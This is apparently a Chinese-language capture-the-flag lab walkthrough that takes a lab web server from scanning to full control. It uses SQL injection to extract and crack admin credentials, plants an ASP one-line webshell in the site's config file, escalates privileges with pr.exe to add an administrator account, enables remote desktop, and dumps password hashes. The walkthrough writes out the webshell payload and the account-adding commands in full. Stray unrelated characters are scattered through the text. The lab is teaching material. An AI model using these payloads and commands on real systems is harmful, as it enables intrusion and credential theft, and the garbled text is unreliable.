本文來源：

01-在線挑戰(zhàn)詳細攻略-《我很簡單旭寿，請不要欺負我》

系列文章：

02-在線挑戰(zhàn)詳細攻略-《網(wǎng)站綜合滲透實驗》

03-在線挑戰(zhàn)詳細攻略-《又見DZ暴浦，我能拿你怎么辦》

04-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽：Reinstall真題》

05-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽：框架漏洞真題》

Setp 0

實驗環(huán)境

實驗地址：bbs.ichunqiu.com/thread-1783-1-1.html

操作機：Windows XP [172.16.11.2]

目標機：Windows server 2003 [172.16.12.2]

實驗工具： 中國菜刀 Pr 御劍 Pangolin 3389

本實驗要求獲取www.test.ichunqiu網(wǎng)站的服務器權限溅话。

ps：圖片可單擊放大觀看。

Step 1

目錄掃描

工具：御劍

路徑：C:\Tools\目錄掃描\

打開御劍歌焦，在域名中輸入http://www.test.ichunqiu飞几，開始掃描；

在目錄列表中查找后臺独撇，發(fā)現(xiàn)存在/admin

雙擊打開后臺登錄頁面http://www.test.ichunqiu/admin

不過用戶名和密碼都不知道屑墨，沒關系，進行下一步：獲取用戶名和密碼纷铣。

Step 2

工具：旁注WEB綜合檢測程序Ver3.6修正版

路徑：C:\Tools\注入工具\Domain3.6\Domain3.6.exe

打開工具卵史，依次點擊 [SQL注入] -->[批量掃描注入點] --> [添加網(wǎng)址] --> [批量分析注入點]；

點擊OK進行下一步关炼；

注入點分析完畢后程腹，會在下方列表中顯示可注入的地址，選擇其中一個地址儒拂，右鍵選擇 [檢測注入]寸潦；

點擊 [檢測注入] 后，主界面從 [批量掃描注入點] 轉到 [SQL注入猜解檢測]社痛，點擊 [開始檢測]见转；

檢測完畢后，顯示可以注入蒜哀，并列出了數(shù)據(jù)庫類型：Access數(shù)據(jù)庫斩箫；

下面開始逐步 [猜解表名] -->[猜解列名]--> [猜解內(nèi)容]；點擊 [猜解表名] 后，在數(shù)據(jù)庫列表中會顯示4個表乘客，分別是admin狐血、user、movie和news易核；

選擇admin表匈织，點擊 [猜解列名]，成功猜解出三個列名id牡直、username和password缀匕；

勾選username和password，點擊 [猜解內(nèi)容]碰逸，右側列表中成功顯示用戶名admin乡小，密碼469e80d32c0559f8

當然密碼是MD5加密的，打開本機瀏覽器饵史，輸入http://www.cmd5.com满钟，輸入剛剛查詢到的密文，點擊 [解密]约急；

成功找到明文密碼：admin888零远；

注入的方法與工具很多苗分，或者也可以這樣：在瀏覽器中打開網(wǎng)站首頁http://www.test.ichunqiu厌蔽，在最新產(chǎn)品中隨便選擇一個打開 [注入點太多]；

復制URL [www.test.ichunqiu/ProductShow.asp?ID=7]摔癣，使用工具：穿山甲

工具：[穿山甲Pangolin]

路徑： C:\Tools\注入工具\pangolin

Pangolin是一款幫助滲透測試人員進行Sql注入測試的安全工具奴饮。所謂的SQL注入測試就是通過利用目標網(wǎng)站的某個頁面缺少對用戶傳遞參數(shù)控制或者控制的不夠好的情況下出現(xiàn)的漏洞，從而達到獲取择浊、修改戴卜、刪除數(shù)據(jù)，甚至控制數(shù)據(jù)庫服務器琢岩、Web服務器的目的的測試方法投剥；

打開穿山甲，輸入URL担孔，點擊綠色三角箭頭進行注入操作江锨；

點擊 [Dates] 切換到Dates選項卡，點擊 [Tables] 成功猜解出4張表糕篇；

獲取內(nèi)容的原理同Domain的使用方法一樣啄育，[猜解表名]-->[猜解列名]-->[猜解內(nèi)容]；

同樣能獲取用戶名和密碼拌消；

下一步：登錄后臺挑豌，上傳木馬；

Setp 3

打開后臺登錄頁面，輸入用戶名admin氓英，密碼admin888侯勉，輸入驗證碼，點擊 [ENTER] 登錄后臺铝阐；

久違的后臺終于進去了….

點擊左側菜單欄中的 [系統(tǒng)設置管理]-->[網(wǎng)站信息配置]壳鹤，用修改配置文件的方法獲取WebShell；

打開相應頁面后饰迹，將 [公司名稱] 內(nèi)容修改為一句話木馬"%><%Eval Request(Chr(35))%><%'

寫一句話木馬的時候注意閉合芳誓；

點擊最下面的 [保存設置] 按鈕；

如果插馬成功啊鸭，[公司名稱] 內(nèi)容為空锹淌；

打開 [中國菜刀] 連接一句話木馬；

工具：中國菜刀? ? 路徑：C:\Tools\webshell\中國菜刀

打開菜刀赠制，右鍵空白處赂摆，選擇 [添加]；

在地址欄中輸入http://www.test.ichunqiu/inc/config.asp钟些，為什么是這個路徑烟号？因為我們剛才修改的網(wǎng)站信息配置頁面，就是這個路徑政恍，可以自己下載一個魅力企業(yè)網(wǎng)站管理系統(tǒng)源碼看看汪拥，2007或2009版的都行，里面的目錄結構一目了然篙耗；

連接密碼為#迫筑，密碼為什么是#？ 往上看一句話木馬宗弯，里面有個chr(35)脯燃，#的ascii碼就是35，當然這個密碼可以隨便設置，只要保證服務端一句話木馬里的密碼和添加SHELL時輸入的密碼一致即可，點擊 [添加]由驹；

添加成功后會新增一條記錄；

雙擊這個URL逝嚎，成功進入！

解釋一下一句話木馬邑狸，/inc/config.asp的源碼是這樣的：

<code>

<%

Const SiteName="魅力企業(yè)網(wǎng)站管理系統(tǒng) 2007 中英繁商業(yè)正式版"? ?? ???'網(wǎng)站名稱

Const EnSiteName="MSCOM 2007"? ?? ???'網(wǎng)站名稱

Const SiteTitle="魅力軟件"? ?? ???'網(wǎng)站標題

Const EnSiteTitle="MelyySoft"? ?? ???'網(wǎng)站標題

Const SiteUrl="www.melyysoft.com"? ?? ???'網(wǎng)站地址

Const Miibeian="湘ICP備05011184號"? ?? ???'網(wǎng)站備案號

….

%>

</code>

構造一句話木馬：

<code>

"%><%Eval Request(Chr(35))%><%'

</code>

插入一句話木馬后懈糯，config.asp代碼會變成這樣：

<code>

<%

Const SiteName=""%><%Eval Request(Chr(35))%><% '"? ?? ???'網(wǎng)站名稱

Const EnSiteName="MSCOM 2007"? ?? ???'網(wǎng)站名稱

Const SiteTitle="魅力軟件"? ?? ???'網(wǎng)站標題

Const EnSiteTitle="MelyySoft"? ?? ???'網(wǎng)站標題

Const SiteUrl="www.melyysoft.com"? ?? ???'網(wǎng)站地址

Const Miibeian="湘ICP備05011184號"? ?? ???'網(wǎng)站備案號

….

%>

</code>

代碼再整理規(guī)范一點就是這樣：

<code>

<%Const SiteName=""%>

<%Eval Request(Chr(35))%>

<% '"? ?? ???'網(wǎng)站名稱

Const EnSiteName="MSCOM 2007"? ?? ???'網(wǎng)站名稱

Const SiteTitle="魅力軟件"? ?? ???'網(wǎng)站標題

Const EnSiteTitle="MelyySoft"? ?? ???'網(wǎng)站標題

Const SiteUrl="www.melyysoft.com"? ?? ???'網(wǎng)站地址

Const Miibeian="湘ICP備05011184號"? ?? ???'網(wǎng)站備案號

….

%>

</code>

所以插入一句話木馬一定要保證整個代碼的語法是正確的，否則肯定不成功单雾；

下一步赚哗，添加賬戶-->開啟3389-->遠程桌面連接-->獲取管理員賬戶密碼她紫；

Step 4

進入C:\RECYCLER目錄，準備上傳提權工具屿储；當然可寫的目錄不知這一個贿讹，還有其他的；

提權工具包括pr够掠，3389民褂，cmd，路徑：C:\Tools\提權工具\windows

開始上傳工具疯潭，選中這三個文件赊堪，用鼠標直接拖到中國菜刀中，即可完成上傳竖哩；

上傳成功哭廉；

Pr.exe提權

Windows跟蹤注冊表項的ACL權限提升漏洞??KB952004??MS09-012

Windows管理規(guī)范（WMI）提供程序沒有正確地隔離NetworkService或LocalService帳號下運行的進程，同一帳號下運行的兩個獨立進程可以完全訪問對方的文件句柄相叁、注冊表項等資源遵绰。WMI提供程序主機進程在某些情況下會持有SYSTEM令牌，如果攻擊者可以以 NetworkService或LocalService帳號訪問計算機增淹，攻擊者就可以執(zhí)行代碼探索SYSTEM令牌的WMI提供程序主機進程椿访。一旦找到了SYSTEM令牌，就可以獲得SYSTEM權限的提升虑润。

使用方法：

<code>pr.exe "net user hacker 123 /add & net localgroup administrators hacker /add"</code>

net user hacker 123 /add

添加一個用戶名為hacker成玫、密碼為123的賬戶；

net localgroup administrators hacker /add

將賬戶hacker添加到管理員組端辱；

提權有很多種梁剔，如巴西烤肉Churrasco.exe等；

下一步舞蔽，執(zhí)行提權操作；

右鍵cmd.exe码撰，選擇 [虛擬終端]

成功進入渗柿，將目錄切換到C:\RECYCLER

用pr.exe執(zhí)行cmd命令，添加賬戶脖岛；

<code>pr "net user hacker 123 /add"</code>

第一次執(zhí)行命令有可能不成功朵栖，怎么辦？

沒關系柴梆，再執(zhí)行一次就OK了陨溅；

賬戶添加成功，下一步绍在，將hacker賬戶添加到系統(tǒng)管理員組门扇；

<code>pr "net localgroup administrators hacker /add"</code>

添加成功雹有，下一步，開啟3389臼寄；

pr 3389

如果找不見目標IP地址霸奕，請點擊右上角 [場景拓撲圖] 進行查看：

輸入目標IP地址：172.16.12.2，開始連接吉拳，繼續(xù)輸入用戶名hacker和密碼123质帅，進入系統(tǒng)；

3389連接成功留攒！下一步煤惩，獲取系統(tǒng)管理員密碼，準確的說是獲取系統(tǒng)管理員密碼的hash炼邀，上傳密碼獲取工具 盟庞，還是使用菜刀上傳；

工具一大堆汤善，隨便用什猖，這里我們使用QuarksPwDum，開始上傳红淡；

上傳成功不狮，進入目標機，運行QuarksPwDump在旱。注：打開cmd摇零，用命令行啟動QuarksPwDump，不要直接雙擊桶蝎；

運行后驻仅，會出現(xiàn)如下界面：

繼續(xù)輸入命令：QuarksPwDump --dump-hash-local

執(zhí)行后的結果如下：

成功獲取到administrator的hash：62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85

暫時切換出實驗環(huán)境，在你的電腦上打開瀏覽器輸入http://www.objectif-securite.ch/en/ophcrack.php登渣，在頁面的相應位置輸入hash噪服，然后GO；